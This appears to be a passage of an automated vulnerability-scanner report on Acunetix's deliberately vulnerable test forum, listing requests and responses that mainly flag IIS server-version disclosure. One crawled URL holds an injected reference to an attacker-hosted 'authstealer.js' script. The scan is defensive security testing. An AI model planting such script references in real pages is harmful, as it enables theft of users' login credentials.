Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 327 bytes. |
GET http://testasp.vulnweb.com/avatars/0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/noavatar.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 338 bytes. |
GET http://testasp.vulnweb.com/avatars/noavatar.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:28 GMT Accept-Ranges: bytes ETag: "92c8971f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 950 |
| Response Body - size: 950 bytes. |
GIF89addæÿÿÿá
üüüþþþúúúûûûÿþþá þþÿå1:ÿÿþæ:Bã$þÿþÿþÿáímrìzèMTä*3õ²µêU[öööä$-ìdjò«®çFMï â!æ/8ââï úÕÖùùúûúúò¥§æBIé_eìqvó»½ñíùÌÎç@GòöÑÓþúúùññ÷æçä(÷ââúÜÝùùùâ÷÷÷úêëýýýð÷ÝÝýóóñ¿Áêioâ!èCJøÇÉñ´¶ôÉËþÿÿðûßàî|îóÝÞïøÞßøõõîqx÷÷øø÷øþüüûàâíöÁÂùÓÔöÚÚîw|ôÆÈûøøòúÙÚíáûÝßäó¡ë`fúÏÑûÞßã&ð°øøøèHNýïï!ù,ddÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÀרÙÚÛÜÙÄ å 9Q9à×óñóàÆDé Y¨èÀ WH'Hß¾g^t@±bE(¼Æã A Æ(-ÚHá,Ä0+61°Ìå1@ Í8q²D!¨Q4øôÁ Éà AZ°iCL±1R ¥-Sn(Fìÿ(Tè°`¸]R.Ø8CJ[@9¡ )¿ v¥\P°AÊÄ.¤tbAÊ=,hHÙXØ o$H â:I)äIe TH©Øj*ÌDjñB&¿C æå3pD §C¢ V¸;L0 0&Øñ¸ @ÀX`Ô'ФÄ0H AÀî§`t ]`ÃP ,0ÀH¨á°üp.HH(¦¨â,¶¨â.Æ(ãÕÔhã8æ¨ã<öèã@)äDiäH&©äL6éäPF)åTViå«; |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 309 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Images/logo.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 313 bytes. |
GET http://testasp.vulnweb.com/Images/logo.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 248 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:31 GMT Accept-Ranges: bytes ETag: "ceff952185c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4933 |
| Response Body - size: 4,933 bytes. |
GIF89a2&÷HÍHå0¶0¨ò¨$«$îâHÄHªîëxÝxTÑTlálTÚTêHÒH0Ò0ôýîï0Å0TÌTÅÞ0º0ÿÿÿÆÍlÖlñ`Î`£0Î00Ì0`Ø`0°0`Ë``â`0®0lÑl¾HÙH±í<Å<0Ê0xâxxàxlÚlTàT`Þ``Ü``Ó`µHÜHHÚH¶xåxÊx×x$¾$`Ú`TÞT$Î$ÿÿ¿á
ËÊÌÉ???ÃÆÈÇ¿¿¿£½Ä§º¾°ÂÀ¢µ¸¤¨¶±¿ ¡ÁÅ»¬¹©®ª´¥«¯¼¦·þþý²³ïïï///___OOOÏÏÏ0Ç0ðßßßí¯¯¯`Ð`´ú´ñ´ù´`Í`oooá é`É``Ì`å1:¨ø¨´û´´ü´æ:Bã$xèxíøĘ̂÷¨êU[ímrä$-èMTä*3áTÄTìdjçFMüééå0¾0ítz`Ñ`æ/8ò²´â!ââöÂŨõ¨ðìä(üâãõ¼½öר<×<é_eò`Õ`xëxô¨¬ç@GèCJâ!ó£§êioúæçûÞßHÊHæBIïâlÝl$É$®<¼<òñ¦¨òH½HõÌÍýïïüäå÷ÓÔùßáúìì<Ú<TÖTñ±<È<ï}äáèHNã&ôÅÇë`fÐ$À$lçlõ°³ùØÙ¿HÕH$Ò$ö²µxØxïïñ £ë$¸$òº½üíîTÊT!ù,2&ÿ()Bp`II°I&B|ò¤IET2RѲq£Z¶¥d:'éгRK1Pbf¥¦Í@8ËèÜÙ¥ç.wî¼ú¢gàYz¥é5OÕ¨áCÕ«_¾¬Ñºf ¯zÂêé3¶O:h¥Í#HP<~âúC·M1vÛÚ[È_¿{f ÃØJø±;` <§²å?¹hæs7ݸ1CtÓqȨVí¤µk/^Àö"¶9r¤èÞ]¥÷ßU¦_BøãK7r¹çHABسkßν»÷ïàÃÿO¾¼ùóç EÎ9rá¿«H©wíÖ«ã#Z´fÌÌ1Yd b ahìaÈ^yÑåÇ[l¡Ext TñÕI5ÔO?éH#ÆäJ(E1ÒGT<Ñ"E1¤@JXÞ8æ¨ã<î¨{Ï)wDq¿ÅGßmµÅ¶§&ZgÿY6%V`ro©UY~µÕR%USI}TO]h'¦¨â eDQE9ÄPBac*è j÷ãtA"G¤»Ý~ª5iFa& T`iI×p½ ÖaUh¡UÉaCõ´N5Áÿ 'J(m1'w¨'}Öx]¡À+ì°R']{Æ-_|ºÙkê7iÔF)àih``{åðβåå¦fE¦N-EÔO®RF&Æ©¢,Úyg2$ÐÄöëï¿èz¬{Dö&_³I*É$jV¥×RYàaWî!%Bd<F¸~ ¦©c¹!¾Ánï8,¥h«Hõ¶g3îû+À8ç,%XAè@6§qðõ¶[®9Áä~ÓVËEMibÛúñÕúáÖ¸¥VH&ª¦[òÉnÆÊ2%Á3»*4#¿:Ç-wa÷!2]Ð/ÿk0ÂÏ*½piM?ýtI rµÆrê±X^.%2N%Î$ï¼tÖ{ï{æ[Ü9Êc,¬,K*çãÍÜ´{çÝDH·±¿ç·ÑÎ>´Óþ1¶F$W["B5tAØÖäZxîå$eò¯ªìùi«Í9ÔöA6ë8A6·áþûïïÊ)µÇm Ý>g·H#ül,{B²c´fÑæQùaÚ'%MAÌËX5ìÂ¥¶p-L!Ù:´½ ¡{ÓÙLB¯µ±MOÑêÌ]Àï /\4ê³û!ÃZïX´Ö'pÃ+Íÿ µ9<¦J @AEL¥ÓÌt¦¥°jM¯2Ûk%¾½O22¯p4 ~Ôh ÿeC K`Ú¤Ù(a {xDm¡A àÆ¤ç1²éBRÕRÆÆ&Á*&³ÓÆ+|ñªO+,ZqÆN¾¯kìWûG¡)¿in'8I-¦È- ²KÔ ®§H£EsíRY¼XbQRW»Ê×@2 MnÂÜ*B9¬Q«r ;! !°àR¸A Jha¥@ BñpÆ3§°ÐÀ®öÿP k=Æ h`p+5HèÔagÀ@%&ÚHxÀ<ÁÑDáûÀĸÁ`àðU³1gÏ&4ÕèJ0wL D¬,pGHÝÁGèn§==ªvxêÓì È%;Fè´;ªÝ¼aç©°Û" úU²fà©XpÄv$ÑÓ¦çPÑ1妰ztóq?¸DÆ"À8îqBè®Ä¥aa~X!`c~@c zÊ]¸-àP« ¨¸Z&Lt5ܰ#XÁ>8Äm¼ÙxL!ÓÚÿÃÝ +îp÷T»mØ-îüq§¸DÐU*\»=b;Ъp¡ÖPU¸LÀÎr±cCExU»vs«xt¤öÌUÅ^É6ÍXaX!L¢0ìcý`÷ aåºÚ·ÙÎf(: mÆF§« ±@c/PºÐÝ .dê WÈtÛA.¸Þ4¹Ù±!1Ö ¸Æ ±o³sÝcÁ 6ÅR£k7«âøÄ(«nÇUë!»ØA.3\F¼*Î8{׫ñUip¯fâ+ùR©¾EC~÷ØÔ½-°Pó3Xÿìh! XL`¢±w¾&Î7§$E-Nh$C¤Æ7´S7»»Áqѱ~w§ùC®,i#a>±[û\í ÷ÑÖï3pâçÚ°ouâ*$â ãj gл×Ö´÷j AX.pÙËv3aöPË»0àq hAÎ\1Ö¶(8ëYW)XðÜã.ð<8c ÁLg!ìÉmé7rqÆM°¢;ñpá}¡G;ÀSí¶êãÆØÔ¦ªw·s»g§ÒèN¥j#¯Òø®"ª[õË9<ÔkÆ6p° X¹5?ÿ¸Z)°Fürb óÇ«ò. ¸ÔÒùYy\ÄöæF~;Ü F÷Hp5hD«° e{Ô[Ø9E*n1 ~gàé8ã(´sb¥j§Ò(fõÁ»£i§ÝâÝùwÞ3+ØýîZMñÚ·«GDÚÑ«Nv5 üM "DkJpµHË?Æ&,¶MKSp Èèú«ÑLÍ«âRÞ¼¦.Î@^qµW¼¨W{ýXØQÅ[_² q§µ£[á¿íkçôÛù¾¹«¸¹»Õû {dî wý<ïäJ«]oMÿ3¦@È{ò3¯|Æn>«)`zf9ç·rÙ & ôÞ¸3v9àj#p'°u Á'FußQFfäPf$ ØA għÞ\Æm·pÕÇÎg7À$X&(}nÄ|ÒG¥¼Ó;Ý1ßw0r~NP W³ ã0ð%yÒµlÍÖ~ó~¢ò1´@à öçfWmrz1QZ&ñ3¯{ïö6è«pFý¬`F®0g[v]|F}!èpâQq*8iG×që(æµê%¢px ¨xNÀxNÿÂ\æWfÌfywÑW£ma³p5üÀBàö÷fÀ&T(V¨"X(ZHèn¦s:_ØôCgpF¸ÅpFÆ ?vsUÛvÂH|ÈÈy'|urw=ÖàFzøÆÁk.øÙ´ W#C'ç)p5¨¤ÐÖlSW£Bm°Oó*ð%Ïv5]õVôfÀ.1ذ2Wã iÓ¯ø±Ø èã'µÈëpFÝÒpFì©pFú0pØþ&i×GܸVÜ5FptwxèiB};µw#ÿ\%édO6kqT2ð8p"·^N 3 NPò8¡Ð ð8äPëGAÕ<1 WxtMØKð8Àç1°BÀ"á[1(daaÛ±f4 ` 1?«v C½øp=vT bo§UC@ØqÖ U-w ¯Æq [^u])k7KàþÕk%póAH@è_6 fa)6pÐnFI'$0/n \(FIehF ¤{9·Cà°T»ÕZøv~;D S$©$;)©j0ÿ)^×I'6bßuHæç~gJÉ!ðÐX¢®¡¼XÕòîÕSsëç)~ÐgX`=¹*Fñþ¤1Éh'±B5CÚA[wŰaCð íCÀÀVÐ+æØwÒµ[;;Ôµ{h1©|Øuiì ^;*U"kß4¤(ÅqC6¨;Ð ôðWó(0 C=À ô J2GYu+S Ú"9sYÛ" ?Ìðâá¡/ÄÜq°LÀ@¤ÛA X@IõSÀ$ÿ¨ ĸ#ðÊiE;PVk47À, <Â$)P Ð3(à: @.-Yrw0 ³À6A=w`Qà@"iÚ2ÅT'ö23ïÆ+´ùðB äñî³ â@Màª};´(FBH)d°CD-ð4QcXÉ âÒqKÕ³e*j°H¿LïRoò*6Qã#3`4ñF ¤@ ±P¢ò¦ À«x®K(QÆCEr0u$<£ë:¥¯³%5¢<E_ÿi9aã ÛHï"Bqâ2jãEȤ¡ná{´qMH:G&{²¡£á0Ó²!KÛB«1Ë%Eb2þú¯d2Û³9Þ/r">$aÔ+F´nû/p$§D@t´JÂãxG,5U[ Pò%rKw_Q.S.yEÔ&$+òò2,¢.Bj;{mû¶ûFÞ,À0)Bä4î1~;«  M.\s¸Ö£A°2>ë¬sB'ñE4CÕº¹Àë/F*·Éò;Í"³aN®4DÖ<~D«"H®{Aaj9#¶jâ*=+?û¬&Ä6ÿû»Á;¾ÁRJAÉ´&ë,Ð");X)T+Kr%ô*H%.G¬BE«ÂAÛ#"ÛIÎÊEº¶øÒAK¾ #@»,Ìb@É+8KÓ4P5RÓÊ)µ*³â"Óµù*³K¬¥W6Íê¬/3Àö¾¾ë+1#A¼²'æy#Q¹Á>¬°#A&A+*Á/á46q9±:Á& "Dá!J¡LáP!SQWaY±]á`!dagkÑo!sQ¶j|Ña1 q¡á!a ÁýA8ûK"BIÓÏ2µQ¹Ñ(ó Åaî¡ '@R; |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
